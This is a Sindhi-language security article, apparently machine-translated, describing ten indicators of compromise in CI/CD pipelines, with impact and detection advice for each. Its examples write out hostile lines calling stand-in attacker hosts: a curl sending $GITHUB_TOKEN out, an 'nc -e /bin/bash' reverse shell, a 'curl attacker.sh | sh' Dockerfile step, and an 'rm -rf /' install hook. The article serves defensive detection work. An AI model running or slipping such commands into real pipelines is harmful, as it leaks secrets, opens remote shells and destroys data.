تعارف: سائبر سيڪيورٽي ۾ سمجهوتي جا اشارا ڪهڙا آهن؟
سمجهوتي جا اشارا پهرين ڊيڄاريندڙ نشانيون آهن ته توهان جو نظام يا pipeline حملي هيٺ ٿي سگهي ٿو. سادي لفظن ۾، سمجهوتي جا اشارا حملي آورن پاران ڇڏيل نشان آهن، عجيب وانگر logins، فائل تبديليون، يا لڪيل مالويئر. ۾ آءِ او سي سائبر سيڪيورٽي، اهي جرم جي جاءِ تي آڱرين جي نشانن وانگر ڪم ڪن ٿا، توهان کي واضح ثبوت ڏين ٿا ته ڪجهه غلط آهي. تنهن ڪري، جڏهن ڊولپر پڇن ٿا سمجهوتي جا اشارا ڪهڙا آهن؟، جواب صرف سرورز يا فائر والز تائين محدود ناهي، ان ۾ جديد ۾ لڪيل خطرا پڻ شامل آهن CI/CD pipelines.
انهن ۾ pipelines، حملي آور ڪوڊ سان ڇڪتاڻ ڪري سگهن ٿا، خراب انحصار کي داخل ڪري سگهن ٿا، يا بنا ڪنهن نوٽيس جي تعمير جا مرحلا تبديل ڪري سگهن ٿا. بهرحال، گهڻا گائيڊ اڃا تائين صرف سرورز يا نيٽ ورڪن تي ڌيان ڏين ٿا. نتيجي طور، سافٽ ويئر سپلائي چين آسان ترين هدفن مان هڪ بڻجي چڪو آهي.
انهيءَ ڪري سمجهوتي جا اشارا ڳولڻ CI/CD pipelines ضروري آهي. سڀ کان وڌيڪ، اهو ٽيمن کي مالويئر کي بلاڪ ڪرڻ، رازن جي حفاظت ڪرڻ، ۽ سافٽ ويئر پهچائڻ جي هر قدم کي محفوظ ڪرڻ ۾ مدد ڪري ٿو.
۾ سمجهوتي جا مٿيان 10 اشارا CI/CD Pipelines
جڏهن سمجهوتي جي اشارن جي وضاحت ڪندي، گهڻيون فهرستون سرورز يا نيٽ ورڪن تي ڌيان ڏين ٿيون. اڃا تائين CI/CD pipelines، حملي آور تمام مختلف آڱرين جا نشان ڇڏيندا آهن. انهن سگنلن کي سڃاڻڻ فعال دفاع لاءِ اهم آهي. هيٺ ڏنل 10 IOC سائبر سيڪيورٽي ريڊ فليگ آهن جيڪي هر ڊولپر ۽ سيڪيورٽي انجنيئر کي ڏسڻ گهرجن.
1. مشڪوڪ انحصار ۾ تبديليون
سمجھوتي جي مکيه اشارن مان هڪ pipelines هڪ اوچتو، عجيب انحصار اپڊيٽ آهي. حملو ڪندڙ اڪثر ڪري پيڪيج مئنيجرن ۾ ڊولپرز جي اعتماد واري جاءِ کي خطرناڪ پيڪيجز شامل ڪرڻ لاءِ استعمال ڪندا آهن.
مثال طور، npm a ۾ package.json اوچتو فرق ۾ شامل ٿي سگھي ٿو:
+ "crypto-helper": "^1.0.2" اهڙيون تبديليون محفوظ نظر اچن ٿيون پر هر بلڊ ۾ ٽروجنائيزڊ ڪوڊ داخل ڪري سگهن ٿيون.
اثر سمجهوتو ڪيل بلڊز سرچشمي تي مالويئر جي وارث ٿين ٿيون.
چڪاس: انحصار جي جائزي کي لاڳو ڪريو، لاڪ فائل جي فرقن کي ٽريڪ ڪريو، ۽ هر وقت نوان پيڪيجز اسڪين ڪريو.
2. بلڊز ۾ مبهم ڪوڊ
مالويئر ليکڪ جائزي کي نظرانداز ڪرڻ لاءِ ابهام تي ڀروسو ڪندا آهن. نتيجي طور، سمجھوتي جو هي اشارو CI/CD pipelines کي پڪڙڻ ڏکيو ٿي سگهي ٿو. حقيقت ۾، مبهم پيل لوڊ اڪثر ڪري اوپن سورس لائبريرين يا ڪنٽينر تصويرن ۾ بغير اطلاع جي سلپ ٿي ويندا آهن.
مثال طور:
- هڪ PyPI پيڪيج استعمال ڪندي
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - هڪ ڊاڪر تصوير جيڪا غير ضروري UPX بائنريز سان ڀريل آهي.
- جاوا اسڪرپٽ سان ڀريل
\x41\x42سند چورن کي لڪائيندي فرار ٿي ويندو آهي.
اثر لڪيل ڪوڊ بلڊ يا رن ٽائم دوران خاموشي سان عمل ڪري ٿو، جيڪو ان کي IOC سائبر سيڪيورٽي ۾ هڪ اهم سگنل بڻائي ٿو.
چڪاس: گڏوگڏ SAST انڪوڊ ٿيل يا پيڪ ٿيل ڪوڊ کي نشانو بڻائڻ لاءِ مالويئر اسڪيننگ سان. سڀ کان وڌيڪ، ابهام کي هڪ ڳاڙهي جهنڊي طور سمجهيو جيڪو وڌيڪ جاچ جي لائق آهي.
3. گٽ ۾ ظاهر ڪيل راز: هڪ ڪلاسيڪل IOC سائبر سيڪيورٽي خطرو
CI/CD pipelineاڪثر ڪري راز سڌو سنئون ذخيرن مان ورثي ۾ ملندا آهن. جڏهن ته، جڏهن راز گٽ ۾ ظاهر ٿين ٿا، اهي سوال جي واضح ترين جوابن مان هڪ بڻجي ويندا آهن "۾ سمجھوتي جا اشارا ڪهڙا آهن؟" pipeline"ڇا؟" هڪ ڀيرو سندون گٽ ۾ اچي وڃن ٿيون، حملي آور انهن کي غير معين مدت تائين استحصال ڪري سگهن ٿا.
مثال طور:
- A
.envفائل جنهن ۾ شامل آهيAWS_SECRET_KEY=. - ٽوڪن داخل ڪيا ويا
config.json. - گٽ جي تاريخ ۾ راز اڃا تائين هٽائڻ کان پوءِ به نظر اچن ٿا.
اثر ظاهر ٿيل چاٻيون حملي آورن کي سڌو رسائي ڏين ٿيون CI/CD pipelines، ڪلائوڊ سسٽم، يا ڊيٽابيس. تنهن ڪري هي سمجهوتي جي سڀ کان خطرناڪ اشارن مان هڪ آهي.
چڪاس: استعمال pre-commit hooks ۽ ڳجهي اسڪيننگ لاءِ سي آءِ نوڪريون، ۽ ليڪ ٿيل چاٻين کي فوري طور تي رد ڪريو. اضافي طور تي، ايڪسپوزر ونڊوز کي گهٽائڻ لاءِ خودڪار علاج لاڳو ڪريو.
4. ڇڪتاڻ Pipeline ترتيبون: سمجهوتي جا لڪيل اشارا
Pipeline ترتيبون اعليٰ قدر جا هدف آهن ڇاڪاڻ ته هڪ ئي ترميم اڪثر ڪري سڄي ڪم جي وهڪري کي اغوا ڪري ٿي.. نتيجي طور، ڇڪتاڻ ڪئي وئي pipeline فائلون IOC سائبر سيڪيورٽي جو هڪ وڏو خطرو آهن جنهن کي روايتي نگراني جا اوزار گهٽ ئي ڳوليندا آهن.
مثال طور:
GitHub عملن ۾:
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- گٽ ليب ۾: هڪ خراب نوڪري شامل ڪئي وئي
.gitlab-ci.ymlجيڪو حساس ڊيٽا ڊمپ ڪري ٿو. - جينڪنز ۾:
sh "nc -e /bin/bash attacker.com 4444".
اثر اهي غير منظور ٿيل تبديليون توهان جي pipeline حملي آورن لاءِ هڪ مستقل پوئين دروازي ۾، جيڪو واضح طور تي سمجهوتي جي اشاري طور شمار ٿئي ٿو.
چڪاس: دستخط ٿيل ترتيبن کي لاڳو ڪريو، پي آر منظوري جي ضرورت آهي، ۽ غير متوقع ڪمن جي نگراني ڪريو. ان کان علاوه، سيٽ ڪريو guardrails جيڪو خودڪار طريقي سان تبديل ٿيل ڪم جي وهڪري کي بلاڪ ڪري ٿو.
5. مراعات يافته IaC ڊفالٽ
غلط ترتيب ڏنل انفراسٽرڪچر جي تعريف اڪثر ڪري لڪيل پٺاڻ دروازا ٺاهيندي آهي. نتيجي طور، خصوصي ڊفالٽ ۾ IaC هڪ ڪلاسيڪل IOC سائبر سيڪيورٽي خطرو آهن.
مثال طور:
- ڪبرنيٽس جي هڪ ڊيپلائيمينٽ گرانٽنگ پوڊس
privileged: true. - هيلم چارٽ خدمتن کي ظاهر ڪري رهيا آهن
0.0.0.0:22.
اثر حملو ڪندڙ روٽ ليول تائين رسائي حاصل ڪن ٿا يا اندروني خدمتن کي عوامي طور تي ظاهر ڪن ٿا. نتيجي طور، اهي مسئلا حملي جي سطح کي تمام گهڻو وڌائين ٿا.
چڪاس: درخواست ڏيو IaC ضم ٿيڻ کان اڳ گهٽ ۾ گهٽ استحقاق لاڳو ڪرڻ لاءِ اسڪيننگ. اضافي طور تي، پڪ ڪريو ته هر ترتيب جو جائزو ورتو ويو آهي pipeline.
6. غير معمولي بناوت جا رويا
حملو ڪندڙ اڪثر ڪري تبديل ڪندا آهن pipeline بدسلوڪي ڪمن ۾ ڦاسي پوڻ جو رويو. ٻين لفظن ۾، غير معمولي تعميراتي سرگرمي انهن واضح جوابن مان هڪ آهي جيڪي سمجهوتي جا اشارا آهن CI/CD pipelines.
مثال طور:
- عجيب ڊومينز ڏانهن آئوٽ بائونڊ نيٽ ورڪ درخواستون ٺاهڻ لاءِ ٺاهي ٿو.
- هڪ Node.js پروجيڪٽ اوچتو پاور شيل کي جنم ڏئي رهيو آهي
npm install. - هڪ CI جو ڪم وڏيون بائنري ڊائون لوڊ ڪرڻ جيڪي بلڊ اسڪرپٽ ۾ بيان نه ڪيون ويون آهن.
اثر خراب ٿيل بلڊز مالويئر ورهائڻ واري پوائنٽس طور ڪم ڪري سگهن ٿيون. سڀ کان وڌيڪ، اهي هر تعیناتي ۾ خراب پيل لوڊ پکيڙيندا آهن.
چڪاس: غير متوقع عملن يا ڪنيڪشن لاءِ بلڊ لاگز جي نگراني ڪريو. ان کان علاوه، معمول کان ٻاهر رويي کي نشانو بڻائڻ لاءِ انوملي ڊيٽيڪشن کي ترتيب ڏيو.
7. IOC سائبر سيڪيورٽي خطرن جي طور تي خراب پيڪيج اسڪرپٽ
پيڪيج مئنيجر زندگي جي چڪر کي سپورٽ ڪن ٿا hooks جنهن جو حملو ڪندڙ استحصال ڪندا آهن. تنهن ڪري، npm، PyPI، يا Dockerfiles ۾ خراب اسڪرپٽ سمجهوتي جا مضبوط اشارا آهن.
مثال طور:
- اين پي ايم:
postinstallاسڪرپٽ هلندڙrm -rf /يا C2 ڏانهن روشني ڏيڻ. - پي آءِ پي آءِ:
setup.pyانسٽال ڪرڻ تي لڪيل پٿون ڪوڊ تي عمل ڪرڻ. - ڊاڪرفائل:
RUN curl attacker.sh | sh.
اثر حملو انسٽاليشن دوران ٿئي ٿو، ڪنهن به رن ٽائم ٽيسٽنگ کان اڳ. نتيجي طور، ڊولپرز ڪڏهن به نوٽيس نه ڪري سگهندا جيستائين تمام دير نه ٿي وڃي.
چڪاس: انسٽال اسڪرپٽ لاءِ اسڪين پيڪيج ظاهر ٿئي ٿو. ان کان علاوه، خطري کي محدود ڪريو hooks in CI/CD نمائش گهٽائڻ لاءِ نوڪريون.
8. رجسٽري زهر ڏيڻ جي سمجهوتي جا اشارا
حملو ڪندڙ رجسٽرين ۾ نوادرات کي تبديل يا تبديل ڪندا آهن، ۽ اهي واقعا درسي ڪتاب جا مثال آهن جيڪي سپلائي چين ۾ سمجهوتي جا اشارا آهن. pipelines.
مثال طور:
- هڪ ڊاڪر تصويري ٽيگ خاموشي سان ٽروجنائيزڊ پرت سان اپڊيٽ ڪيو ويو.
- هڪ اندروني پيڪيج کي زهر ٿيل نسخي سان تبديل ڪيو ويو.
- npm نيم اسپيس اسڪواٽنگ، جهڙوڪ
lodash-proxy.
اثر رجسٽري آرٽيفيڪٽ استعمال ڪندي هر تعمير سمجهوتو ٿي ويندي آهي. نه رڳو اهو، پر سمجهوتو ڊائون اسٽريم سروسز تائين پکڙيل آهي.
چڪاس: سڀني رجسٽري پلن تي دستخط ۽ سالميت جي چڪاس لاڳو ڪريو. ان کان علاوه، آرٽيڪل جي اصليت کي ٽريڪ ڪريو SBOM تصديق.
9. IOC ثبوت جي طور تي غير معمولي استعمال ڪندڙ سرگرمي
سمجهوتو ٿيل اڪائونٽس تقريبن هميشه غير معمولي نشان ڇڏي ويندا آهن. انهيءَ مطابق، غير معمولي ڊولپر رويي سمجهوتي جو هڪ مضبوط اشارو آهي.
مثال طور:
- Commitمقامي وقت موجب صبح جو 3 وڳي ڌڪ هنيو ويو.
- موڪلن تي اڪائونٽس پاران پي آر منظوريون.
- Pipelineغير معمولي تعدد سان شروع ٿيو.
اثر حملو ڪندڙ چوري ٿيل سندون استعمال ڪري بدنيتي واريون تبديليون داخل ڪندا آهن. آخرڪار، غير مجاز commitعام ڪم جي وهڪري ۾ آساني سان ضم ٿي ويندا آهن.
چڪاس: جي نگراني SCM بي ضابطگين لاءِ سرگرمي، ايم ايف اي لاڳو ڪريو، ۽ ٽوڪن کي باقاعدي طور تي گھمايو. ان کان علاوه، مشڪوڪ تي خبردار ڪريو commit يا منظوري جا نمونا.
10. IOC سائبر سيڪيورٽي ۾ ناڪام سالميت يا دستخط جي چڪاس
هڪ عام پر نظرانداز ڪيل سمجهوتي جو اشارو هڪ ناڪام سالميت يا دستخطي چيڪ آهي. IOC سائبر سيڪيورٽي ۾، اهي چيڪ تصديق ڪن ٿا ته ڪوڊ يا نمونا مستند آهن. انهن کي ڇڏڻ سان pipelineظاهر ٿيو آهي.
مثالون:
- هڪ SHA256 هيش متوقع چيڪسم سان نه ملي رهيو آهي.
- هڪ گم ٿيل يا غلط GPG دستخط.
- An SBOM غير دستخط ٿيل شيون ڏيکاريندي.
اثر سالميت جي ناڪامي جو مطلب اڪثر ڪري ڇڪتاڻ، رجسٽري ۾ زهر ڏيڻ، يا مالويئر انجيڪشن هوندو آهي.
چڪاس: دستخطي چيڪن کي خودڪار بڻايو، چيڪسم جي تصديق کي لاڳو ڪريو، ۽ غير دستخط ٿيل حصن کي بلاڪ ڪريو. سڀ کان وڌيڪ، هر ناڪام چيڪ کي سمجهوتي جي واضح ثبوت طور سمجهيو.
CI/CD هڪ نظر ۾ سمجهوتي جا اشارا
| سمجهوتي جو اشارو (IOC) | ۾ اثر CI/CD Pipelines | ڪيئن معلوم ڪجي |
|---|---|---|
| مشڪوڪ انحصار تبديليون | حملو ڪندڙ پيڪيج مئنيجرن ۾ خراب لائبريريون داخل ڪن ٿا، جنهن جي ڪري ٺاهه ٿيل تعميرات خراب ٿين ٿيون. | لاڪ فائل جي فرقن کي ٽريڪ ڪريو، انحصار جي جائزي کي لاڳو ڪريو، ۽ انحصار کي مسلسل اسڪين ڪريو. |
| بلڊز ۾ مبهم ڪوڊ | لڪيل پيل لوڊ بنا ڪنهن سڃاڻپ جي بلڊز يا رن ٽائم دوران عمل ۾ اچن ٿا. | استعمال SAST ۽ مالويئر اسڪيننگ کي بيس 64، هيڪس، يا پيڪڊ ڪوڊ نمونن کي پرچم ڪرڻ لاءِ. |
| گٽ ۾ راز ظاهر ٿيا | ليڪ ٿيل ٽوڪن يا API ڪيز حملي آورن کي نازڪ سسٽم تائين سڌو رسائي فراهم ڪن ٿيون. | گٽ ۾ خفيه اسڪين هلايو hooks ۽ ليڪ ٿيل سندون پاڻمرادو رد ڪيون وڃن. |
| ڇڪتاڻ وارو Pipeline ضابطا | تبديل ٿيل ورڪ فلو ڊيٽا کي خارج ڪرڻ يا اندر رهڻ جي اجازت ڏين ٿا CI/CD. | پي آر منظوري جي ضرورت آهي، دستخط ٿيل ترتيبن کي لاڳو ڪريو، ۽ مانيٽر ڪريو pipeline تبديليون. |
| استحقاق ڏنل IaC ڊفالٽ | حد کان وڌيڪ اجازت ڏيندڙ ڪردار يا غير محفوظ ڊفالٽ ڪلائوڊ ماحول کي بي نقاب ڪن ٿا. | گهٽ ۾ گهٽ امتياز جي نفاذ لاءِ ٽيرافارم، ڪبرنيٽس، ۽ هيلم فائلن کي اسڪين ڪريو. |
| غير معمولي تعميراتي رويي | Pipelineمالويئر ورهائڻ واري پوائنٽس يا پس منظر جي حرڪت لاءِ استعمال ٿيندا آهن. | غير متوقع ڊائون لوڊ، عمل، يا آئوٽ بائونڊ ڪالن لاءِ بلڊ لاگز جو تجزيو ڪريو. |
| خراب پيڪيج اسڪرپٽ | لڪيل پري/پوسٽ-انسٽال اسڪرپٽ رن ٽائم ٽيسٽنگ کان اڳ پيل لوڊ کي متحرڪ ڪن ٿا. | خطرناڪ npm/PyPI اسڪرپٽ کي بلاڪ ڪريو ۽ عملدرآمد کي محدود ڪريو CI/CD نوڪريون. |
| رجسٽري پوائزننگ | ٽروجن ٿيل شيون رجسٽرين ۾ قابل اعتماد تصويرن يا بائنري کي تبديل ڪن ٿيون. | چيڪسم جي تصديق ڪريو، دستخط جي تصديق کي لاڳو ڪريو، ۽ رجسٽرين کي فعال طور تي اسڪين ڪريو. |
| غير معمولي استعمال ڪندڙ سرگرمي | سمجهوتو ٿيل اڪائونٽس بدسلوڪي کي ڌڪيندا آهن commitايس يا ٽرگر pipelines. | ايم ايف اي لاڳو ڪريو، مانيٽر ڪريو commitبي ضابطگين لاءِ، ۽ تجزيو ڪريو login نمونن. |
| ناڪام سالميت يا دستخط جي چڪاس | ظاهر ڪري ٿو ته خراب ٿيل ڪوڊ، انحصار، يا تصويرون جيڪي داخل ٿين ٿيون pipeline. | سالميت جي چڪاس کي خودڪار بڻايو ۽ غير دستخط ٿيل يا بي ترتيب حصن کي بلاڪ ڪريو. |
روايتي آءِ او سي سائبر سيڪيورٽي ڇو نه ٿي رهي آهي CI/CD مول
گهڻيون تنظيمون اڳ ۾ ئي سرورز، ڪمپيوٽرن، يا نيٽ ورڪن تي سمجهوتي جي اشارن جي نگراني ڪن ٿيون. جڏهن ته، IOC سائبر سيڪيورٽي لاءِ هي ڪلاسيڪل طريقو نظرانداز ڪري ٿو CI/CD pipelines، جيڪي هاڻي سڀ کان وڌيڪ نازڪ حملي جي سطحن مان هڪ آهن. حقيقت ۾، pipelines منفرد سمجهوتي جا سگنل ڏيکارين ٿا جيڪي روايتي اوزار ڳولي نٿا سگهن.
روايتي سيڪيورٽي ۾ سمجهوتي جا اشارا
روايتي IOC سائبر سيڪيورٽي ۾، ڌيان عام طور تي هوندو آهي:
- غير معمولي logins يا IP پتي جيڪي چوري ٿيل سندون ظاهر ڪن ٿا.
- مشڪوڪ فائل هيش يا رجسٽري تبديليون جيڪي مالويئر کي ظاهر ڪن ٿيون.
- غير متوقع ٻاهرين ٽرئفڪ جيڪا ڊيٽا جي خارج ٿيڻ ڏانهن اشارو ڪري ٿي.
اهي مشهور اشارا آهن جيڪي پڻ ٽريڪ ڪيا ويا آهن ميٽر اي ٽي ٽي ۽ سي ڪي فريم ورڪ، جيڪو عام مخالف رويي ۽ حڪمت عملين جو نقشو ٺاهي ٿو. اهي مفيد سگنل آهن. بهرحال، اهي خاص طور تي آپريٽنگ سسٽم يا ڪارپوريٽ نيٽ ورڪن تي لاڳو ٿين ٿا. نتيجي طور، اهي سافٽ ويئر سپلائي چين ۾ اڳ ۾ ٿيندڙ نازڪ ڇڪتاڻ کي ياد ڪن ٿا.
ڇو CI/CD Pipelineمختلف آهن
CI/CD pipelines خودڪار ماحول آهن جتي ڊولپرز commit ڪوڊ، پل انحصار، ۽ رليز بلڊز. حملي آور ڄاڻن ٿا ته هتي هڪ سمجهوتو هر تعیناتي ۾ ٿئي ٿو. مطابق، سمجهوتي جا اشارا ڪهڙا آهن CI/CD pipelineاهي تمام مختلف نظر اچن ٿا:
- هڪ خراب انحصار خاموشي سان package.json يا requirements.txt ۾ شامل ڪيو ويو.
- گٽ ۾ API ڪيز يا ٽوڪن ظاهر ٿيا commits يا .env فائلون.
- npm يا PyPI پيڪيجز ۾ داخل ٿيل مبهم ڪوڊ.
- ٽيرافارم يا ڪبرنيٽس فائلون جيڪي غير محفوظ ڊفالٽ جهڙوڪ پرائيويزيڊ: سچ سان آهن.
- Pipeline ڊيٽا کي ڪڍڻ يا پوئين دروازا کولڻ لاءِ ايڊٽ ڪيل نوڪريون.
اهي سمجهوتو سگنل ۾ CI/CD نظر نه ايندڙ رهڻ standard سيڪيورٽي اوزار.
آءِ او سي سائبر سيڪيورٽي ۾ فرق
جيتوڻيڪ ڪيتريون ئي ٽيمون سمجهوتي جي اشارن جي قدر کي سمجهن ٿيون، پر اهي اڃا تائين صرف سرورز ۽ نيٽ ورڪ لاگز مان ڳولا تي ڀروسو ڪن ٿيون. تنهن ڪري، حملي آور بلڊز کي زهر ڏئي سگهن ٿا يا عام نشانن کي ڇڏڻ کان سواءِ مالويئر داخل ڪري سگهن ٿا. اهو ئي سبب آهي ته XZ Utils جي بيڪ ڊور يا خراب npm پيڪيجز جهڙا واقعا پيداوار تائين پهچڻ تائين اڻڄاتل رهيا.
هن قسم جي سپلائي چين سمجهوتن کي پڻ نمايان ڪيو ويو آهي CISالف جي سپلائي چين سيڪيورٽي هدايت، جيڪو خبردار ڪري ٿو ته حملي آور وڌيڪ نشانو بڻائين ٿا CI/CD pipelines ۽ رجسٽريون.
ڇڏڻو آهي
روايتي IOC سائبر سيڪيورٽي ضروري آهي پر ڪافي ناهي. سڀ کان وڌيڪ، ٽيمن کي سمجھوتي جي اشارن کي سڃاڻڻ گهرجي جيڪي مخصوص آهن CI/CD pipelines. صرف پوءِ اهي خراب ڪوڊ ڳولي سگهن ٿا يا pipeline بدسلوڪي کي ماحول ۾ پکڙجڻ کان اڳ ختم ڪريو.







